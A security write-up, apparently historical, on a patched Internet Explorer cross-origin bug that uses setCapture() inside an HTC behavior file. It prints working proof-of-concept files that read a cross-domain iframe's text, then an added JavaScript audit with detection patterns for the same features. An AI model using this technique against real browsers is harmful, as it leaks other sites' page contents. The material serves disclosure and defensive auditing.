Another variation of the setCapture() UXSS (originally case #6445). The original used setCapture() on the top window; the first variation used it inside a same-domain IFRAME. This one moves the setCapture() call into an HTC (HTML Component) behavior file, which gives it yet another context that wasn’t covered by the earlier patches.

index.html:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDomHTCsetCapture_variation_case6445</title></head>
<body style="behavior:url(setcapture.htc)">
<font face="Tahoma" size="2">
<center>
<h2>xDomHTCsetCapture_variation_case6445</h2>
</center>
This is another variation of case #6445.<br />
The original was a setCapture() on the top window that grabbed the <font color="blue"><b>event.srcElement</b></font> of any
iframe/domain. That one was <u>patched</u>, and we found a variation <b>[WOOBR #953750]</b> doing the setCapture() inside an IFRAME on the same domain.
That first variation was again able to grab the <font color="blue"><b>event.srcElement</b></font> of any iframe.
<br /><br />
This one does not use an IFRAME to do the setCapture() at all. It does the setCapture() <u>inside</u> an
<font color="red"><b>htc</b> document</font> and is able to grab the srcElement across domains.<br /><br />

<center>
<b>Click inside the Google IFRAME to see its <font color="blue">innerText</font>.</b> <br />
<iframe src="http://www.google.com" width="400" height="200"></iframe>
</center>
</font>
</body>
</html>

setcapture.htc:

<html>
<body>
<script language="JavaScript">
document.body.setCapture();
document.onclick=function()
{
	alert(event.srcElement.ownerDocument.documentElement.innerText);
}
</script>
</body>
</html>

HTC behavior files run in a separate document context attached to the element they are applied to. When setCapture() is called from within the HTC document, all mouse events are routed through it, including events that originate in cross-origin IFRAMEs. event.srcElement then refers to an element inside the cross-origin document, and ownerDocument.documentElement.innerText reads that page's entire text.
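All three variations of case #6445 share the same two ingredients in source: an HTC behavior binding (`behavior:url(...)` or `addBehavior()`) and a `setCapture()` call, usually followed by a read through `event.srcElement.ownerDocument`. The following is an added example, not code from the original write-up, showing a small static audit a reviewer can run over markup and script files (from a crawl or a legacy code base) to flag exactly those ingredients. The rule names, the file names and the sample input are constructed for the example.

```javascript
// Added example (not part of the original write-up): a static audit that
// flags the legacy IE features this class of bug depends on. Rule ids and
// sample files below are constructed for illustration.

const LEGACY_PATTERNS = [
  // CSS behavior binding (inline style or stylesheet) that loads an HTC file
  { id: 'css-behavior', re: /behavior\s*:\s*url\s*\(/i },
  // Script-side binding of a behavior
  { id: 'addBehavior', re: /\.addBehavior\s*\(/ },
  // Mouse capture API used by every variation of case #6445
  { id: 'setCapture', re: /\.setCapture\s*\(/ },
  // Reading another document through an event target's ownerDocument
  { id: 'ownerDocument-read',
    re: /ownerDocument\s*\.\s*documentElement\s*\.\s*(innerText|innerHTML|outerHTML)/ },
];

// Scan one file's text line by line; returns one finding per (line, rule) hit.
function scanSource(name, text) {
  const findings = [];
  text.split(/\r?\n/).forEach((line, idx) => {
    for (const p of LEGACY_PATTERNS) {
      if (p.re.test(line)) {
        findings.push({ file: name, line: idx + 1, rule: p.id, text: line.trim() });
      }
    }
  });
  return findings;
}

// Scan a map of { fileName: fileText } and concatenate the findings.
function scanAll(files) {
  return Object.entries(files).flatMap(([name, text]) => scanSource(name, text));
}

// Count findings per rule, which is the quick "is this pattern present at all" signal.
function summarize(findings) {
  const byRule = {};
  for (const f of findings) byRule[f.rule] = (byRule[f.rule] || 0) + 1;
  return byRule;
}

// Constructed sample input modelled on the PoC files above.
const SAMPLE_FILES = {
  'index.html': [
    '<html>',
    '<body style="behavior:url(setcapture.htc)">',
    '<iframe src="https://example.com/" width="400" height="200"></iframe>',
    '</body></html>',
  ].join('\n'),
  'setcapture.htc': [
    '<html><body><script language="JavaScript">',
    'document.body.setCapture();',
    'document.onclick=function(){ alert(event.srcElement.ownerDocument.documentElement.innerText); }',
    '</script></body></html>',
  ].join('\n'),
  'clean.html': '<html><body><p>No legacy bindings here.</p></body></html>',
};

// Usage: run the audit over the sample set and print a grep-style report.
const REPORT = scanAll(SAMPLE_FILES);
for (const f of REPORT) {
  console.log(`${f.file}:${f.line} [${f.rule}] ${f.text}`);
}
console.log(summarize(REPORT));
```

Expected output lists the `behavior:url(...)` binding in index.html line 2, and the `setCapture()` call and the `ownerDocument...innerText` read in setcapture.htc, while clean.html produces nothing. A single hit on `css-behavior` or `addBehavior` is worth a look on its own, since an HTC file is a separate document that any later audit of the host page will otherwise miss.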

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.